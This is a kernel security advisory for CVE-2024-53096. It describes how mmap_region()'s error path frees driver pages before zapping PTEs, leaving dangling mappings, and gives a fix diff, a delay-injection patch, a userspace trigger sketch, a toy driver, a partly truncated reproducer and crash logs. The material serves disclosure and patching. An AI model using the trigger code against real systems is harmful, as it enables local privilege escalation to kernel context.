Summary

The close_and_free_vma error path for late mmap() failures makes drivers free mapped pages (via ->vm_ops->close) before the corresponding PTEs are zapped. Kernels >=5.10 are affected, but kernels before 6.6 are probably only affected on arm64 devices with MTE enabled, or on SPARC devices with ADI. Starting with 6.6, the path becomes easy to reach on any architecture. I have only tested this on 6.6.56 with a delay hacked into the kernel.

Issue description

Commit deb0f6562884 ("mm/mmap: undo ->mmap() when arch_validate_flags() fails") landed in v6.1 and was backported down to v5.10. This commit introduces the following error path in mmap_region():

+close_and_free_vma:
+	if (vma->vm_ops && vma->vm_ops->close)
+		vma->vm_ops->close(vma);
 unmap_and_free_vma:
 	fput(vma->vm_file);
 	vma->vm_file = NULL;
 
 	/* Undo any partial mapping done by a device driver. */
 	unmap_region(mm, mas.tree, vma, prev, next, vma->vm_start, vma->vm_end);

This ordering is wrong: if the region is VM_PFNMAP, vma->vm_ops->close(vma) can free the pages mapped in the region, while it is unmap_region() that removes the PTEs pointing to those pages. Between those two operations, we have dangling PTEs.

Related context

I was looking at this area because of the theoretical issue I mentioned in an earlier bug report (on a bug that Seth Jenkins discovered):

    This codepath also does fput() on the mapped file (which may be different from the file specified by the caller) before doing the unmapping, which could theoretically cause similar safety issues - but from what I can tell, in practice, we currently always end up having another reference to the mapped file (held by the caller-specified file), so that is not currently a vulnerability.

I think the current development version of this code has another bug: it now reads

close_and_free_vma:
	if (file && !vms.closed_vm_ops && vma->vm_ops && vma->vm_ops->close)
		vma->vm_ops->close(vma);

which checks vms.closed_vm_ops (which tracks whether the old VMA has had ->close invoked) to decide whether to call ->close on the new VMA. But that has no security impact because it hasn't made it into a release yet.

Impact

The commit introducing the issue was backported back to 5.10.

The issue leads to dangling PTEs, which could be used to escalate privileges to kernel context if userspace:

 - can trigger this error path, and
 - has access to a driver that uses the ->vm_ops->close callback to manage buffers mapped writably with VM_PFNMAP, such as GPU drivers or /dev/bus/usb/*/*.

To reach this error path, some options are probably:

 - On the 5.10/5.15 LTS trees, only arm64 and sparc can be affected, and only if the system has MTE enabled in the bootloader (on arm64) or supports ADI (on sparc) - the bailout is only triggered by arch_validate_flags(), so other architectures can never reach the bailout path.
 - On the 6.1 LTS tree, we can additionally reach the bailout path on other architectures if a GFP_KERNEL allocation fails, but that's pretty unlikely.
 - On the 6.6 LTS tree and newer, all architectures can easily hit this path due to the map_deny_write_exec() check. (And since v6.7, mapping_map_writable() failure can also hit this bailout.)
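As an illustration of that last point, the following rough, untested userspace sketch (the device path, mapping size, and choice of driver are placeholders I picked for illustration, not taken from this report) shows how a process on a >=6.6 kernel could steer an mmap() of a driver file into the close_and_free_vma bailout: it enables MDWE via prctl() and then asks for a writable+executable shared mapping, which map_deny_write_exec() only rejects after the driver's ->mmap has already run.

#include <err.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/prctl.h>

#ifndef PR_SET_MDWE
#define PR_SET_MDWE 65
#define PR_MDWE_REFUSE_EXEC_GAIN (1UL << 0)
#endif

int main(void) {
  /* Opt in to memory-deny-write-execute: from now on, W+X mappings are
   * rejected by map_deny_write_exec(), which mmap_region() only checks
   * after call_mmap() has let the driver set up the mapping. */
  if (prctl(PR_SET_MDWE, PR_MDWE_REFUSE_EXEC_GAIN, 0, 0, 0))
    err(1, "PR_SET_MDWE");

  /* Placeholder path: any driver whose ->mmap installs a VM_PFNMAP mapping
   * and whose ->vm_ops->close frees the backing pages would do. */
  int fd = open("/dev/bus/usb/001/001", O_RDWR);
  if (fd == -1)
    err(1, "open");

  /* The driver maps its buffer, then the W+X check fails and the kernel
   * takes the close_and_free_vma path: ->close() frees the pages while
   * the PTEs written by the driver's ->mmap are still present. */
  void *p = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC,
                 MAP_SHARED, fd, 0);
  if (p == MAP_FAILED)
    perror("mmap failed (this is the expected outcome)");
  return 0;
}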
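To make the driver-side precondition concrete, here is a minimal, untested sketch of a hypothetical driver ("pfnmap_demo" is made up, not any real device) that follows the pattern described above: ->mmap installs PTEs with remap_pfn_range() and delegates buffer lifetime to ->vm_ops->open/->close, so a ->close call that happens before unmap_region() frees the page while stale PTEs still point at it.

#include <linux/fs.h>
#include <linux/miscdevice.h>
#include <linux/mm.h>
#include <linux/module.h>
#include <linux/refcount.h>
#include <linux/slab.h>

struct demo_buf {
	struct page *page;
	refcount_t refs;
};

static void demo_vm_open(struct vm_area_struct *vma)
{
	struct demo_buf *buf = vma->vm_private_data;

	refcount_inc(&buf->refs);
}

/*
 * On the buggy error path, this runs before unmap_region(), so the page is
 * freed while the PTEs installed by remap_pfn_range() still point at it.
 */
static void demo_vm_close(struct vm_area_struct *vma)
{
	struct demo_buf *buf = vma->vm_private_data;

	if (refcount_dec_and_test(&buf->refs)) {
		__free_page(buf->page);
		kfree(buf);
	}
}

static const struct vm_operations_struct demo_vm_ops = {
	.open  = demo_vm_open,
	.close = demo_vm_close,
};

static int demo_mmap(struct file *file, struct vm_area_struct *vma)
{
	struct demo_buf *buf;
	int err;

	if (vma->vm_end - vma->vm_start != PAGE_SIZE)
		return -EINVAL;

	buf = kzalloc(sizeof(*buf), GFP_KERNEL);
	if (!buf)
		return -ENOMEM;
	buf->page = alloc_page(GFP_KERNEL | __GFP_ZERO);
	if (!buf->page) {
		kfree(buf);
		return -ENOMEM;
	}
	refcount_set(&buf->refs, 1);

	/* remap_pfn_range() marks the VMA as VM_PFNMAP and writes the PTEs. */
	err = remap_pfn_range(vma, vma->vm_start, page_to_pfn(buf->page),
			      PAGE_SIZE, vma->vm_page_prot);
	if (err) {
		__free_page(buf->page);
		kfree(buf);
		return err;
	}

	vma->vm_private_data = buf;
	vma->vm_ops = &demo_vm_ops;
	return 0;
}

static const struct file_operations demo_fops = {
	.owner = THIS_MODULE,
	.mmap  = demo_mmap,
};

static struct miscdevice demo_dev = {
	.minor = MISC_DYNAMIC_MINOR,
	.name  = "pfnmap_demo",
	.fops  = &demo_fops,
};
module_misc_device(demo_dev);
MODULE_LICENSE("GPL");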
Fixing it

I think the combination of the fixes required for this code would probably look roughly like this (entirely untested):

diff --git a/mm/mmap.c b/mm/mmap.c
index 57fd5ab2abe7..bbead78548f6 100644
--- a/mm/mmap.c
+++ b/mm/mmap.c
@@ -1375,6 +1375,7 @@ unsigned long mmap_region(struct file *file, unsigned long addr,
 	struct maple_tree mt_detach;
 	unsigned long end = addr + len;
 	bool writable_file_mapping = false;
+	bool vma_opened = false;
 	int error;
 	VMA_ITERATOR(vmi, mm, addr);
 	VMG_STATE(vmg, mm, &vmi, addr, end, vm_flags, pgoff);
@@ -1451,6 +1452,7 @@ unsigned long mmap_region(struct file *file, unsigned long addr,
 		error = call_mmap(file, vma);
 		if (error)
 			goto unmap_and_free_vma;
+		vma_opened = true;
 
 		if (vma_is_shared_maywrite(vma)) {
 			error = mapping_map_writable(file->f_mapping);
@@ -1574,17 +1576,19 @@ unsigned long mmap_region(struct file *file, unsigned long addr,
 	return addr;
 
 close_and_free_vma:
-	if (file && !vms.closed_vm_ops && vma->vm_ops && vma->vm_ops->close)
-		vma->vm_ops->close(vma);
-
 	if (file || vma->vm_file) {
+		struct file *mapped_file;
 unmap_and_free_vma:
-		fput(vma->vm_file);
+		mapped_file = vma->vm_file;
 		vma->vm_file = NULL;
 
 		vma_iter_set(&vmi, vma->vm_end);
 		/* Undo any partial mapping done by a device driver. */
 		unmap_region(&vmi.mas, vma, vmg.prev, vmg.next);
+
+		if (vma_opened && vma->vm_ops && vma->vm_ops->close)
+			vma->vm_ops->close(vma);
+		fput(mapped_file);
 	}
 	if (writable_file_mapping)
 		mapping_unmap_writable(file->f_mapping);

We might also want to fold the close_and_free_vma and unmap_and_free_vma jump labels together, since my suggested diff introduces a flag that tracks whether the VMA has been "opened" anyway.

Reproducer

Tested on v6.6.56. To make testing easier, I added an artificial delay to my kernel like this:

diff --git a/mm/mmap.c b/mm/mmap.c
index 6530e9cac458..ac7d75157165 100644
--- a/mm/mmap.c
+++ b/mm/mmap.c
@@ -47,6 +47,7 @@
 #include
 #include
 #include
+#include <linux/delay.h>
 
 #include
 #include
@@ -2899,8 +2900,15 @@ unsigned long mmap_region(struct file *file, unsigned long addr,
 	return addr;
 
 close_and_free_vma:
+	if (strcmp(current->comm, "SLOWME") == 0)
+		pr_warn("%s: entering close_and_free_vma path\n", __func__);
 	if (file && vma->vm_ops && vma->vm_ops->close)
 		vma->vm_ops->close(vma);
+	if (strcmp(current->comm, "SLOWME") == 0) {
+		pr_warn("%s: past ->close(), DELAY BEGIN\n", __func__);
+		mdelay(2000);
+		pr_warn("%s: DELAY OVER\n", __func__);
+	}
 
 	if (file || vma->vm_file) {
 unmap_and_free_vma:
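The delay only fires for a task whose comm is "SLOWME"; the thread that performs the failing mmap() can opt in by renaming itself, for example like this (my illustration of one way to do it, not taken from the reproducer below):

#include <sys/prctl.h>

int main(void) {
  /* Rename the calling thread so the hacked kernel above applies its
   * 2-second delay on the close_and_free_vma path for this task. */
  prctl(PR_SET_NAME, "SLOWME", 0, 0, 0);

  /* ... the failing mmap() and the memory dump during the delay window
   * would follow here ... */
  return 0;
}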
And then running this reproducer:

#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

#define MAP_SIZE 0x200000

static char *mmap_area;

static void hexdump(void *_data, size_t byte_count) {
  printf("hexdump(%p, 0x%lx)\n", _data, (unsigned long)byte_count);
  for (unsigned long byte_offset = 0; byte_offset < byte_count; byte_offset += 16) {
    unsigned char *bytes = ((unsigned char*)_data) + byte_offset;
    unsigned long line_bytes = (byte_count - byte_offset > 16) ?
        16 : (byte_count - byte_offset);
    char line[1000];
    char *linep = line;
    linep += sprintf(linep, "%08lx ", byte_offset);
    for (int i=0; i<16; i++) {
      if (i >= line_bytes) {
        linep += sprintf(linep, " ");
      } else {
        linep += sprintf(linep, "%02hhx ", bytes[i]);
      }
    }
    linep += sprintf(linep, " |");
    for (int i=0; i
[...]

On a kernel built with CONFIG_PAGE_TABLE_CHECK, this results in a splat like the following:

[...] 0b 48 83 c4 08 5b 5d 41 5c 41 5d 41 5e 41 5f c3 cc cc cc cc 0f
All code
========
   0:   48 89 fa                mov    %rdi,%rdx
   3:   48 c1 ea 03             shr    $0x3,%rdx
   7:   80 3c 02 00             cmpb   $0x0,(%rdx,%rax,1)
   b:   0f 85 88 00 00 00       jne    0x99
  11:   48 8b 6b 48             mov    0x48(%rbx),%rbp
  15:   40 f6 c5 01             test   $0x1,%bpl
  19:   0f 84 73 fe ff ff       je     0xfffffffffffffe92
  1f:   48 83 ed 01             sub    $0x1,%rbp
  23:   e9 6d fe ff ff          jmp    0xfffffffffffffe95
  28:   0f 0b                   ud2
  2a:*  0f 0b                   ud2             <-- trapping instruction
  2c:   48 83 c4 08             add    $0x8,%rsp
  30:   5b                      pop    %rbx
  31:   5d                      pop    %rbp
  32:   41 5c                   pop    %r12
  34:   41 5d                   pop    %r13
  36:   41 5e                   pop    %r14
  38:   41 5f                   pop    %r15
  3a:   c3                      ret
[...]
RSP: 0018:ffffc90002d37ac0 EFLAGS: 00010202
RAX: 0000000000000001 RBX: ffff88810008b000 RCX: ffffffff9c239e6a
RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffff88810008b004
RBP: ffff88810008b000 R08: 0000000000000000 R09: ffffed1020011600
R10: ffff88810008b007 R11: 6d6d203a70616d6d R12: 0000000000000000
R13: dffffc0000000000 R14: fffffbfff444f2d0 R15: ffff88810008b004
FS:  00007f6b13eda740(0000) GS:ffff888189180000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f6b13fa35f0 CR3: 0000000109696002 CR4: 0000000000770ee0
PKRU: 55555554
Call Trace:
[...]
 free_unref_page_prepare (./include/linux/page_table_check.h:41 mm/page_alloc.c:1142 mm/page_alloc.c:2323)
 free_unref_page (mm/page_alloc.c:2416 (discriminator 1))
 dec_usb_memory_use_count (drivers/usb/core/devio.c:201)
 mmap_region (mm/mmap.c:2906)
[...]
 do_mmap (mm/mmap.c:1383)
[...]
 vm_mmap_pgoff (mm/util.c:556)
[...]
 ksys_mmap_pgoff (mm/mmap.c:1429)
[...]
 do_syscall_64 (arch/x86/entry/common.c:51 (discriminator 1) arch/x86/entry/common.c:81 (discriminator 1))
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:121)
[...]
Modules linked in:
---[ end trace 0000000000000000 ]---

When I instead run it on a build without CONFIG_PAGE_TABLE_CHECK, but with page poisoning enabled (CONFIG_PAGE_POISONING=y plus page_poison=1 on the kernel command line), there is no splat, and the reproducer dumps a bunch of memory full of 0xaa (which is PAGE_POISON, indicating that the pages have been freed).

Disclosure deadline

This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2025-01-15.

For more details, see the Project Zero vulnerability disclosure policy:
https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html

Related CVE Number: CVE-2024-53096
Credit: Jann Horn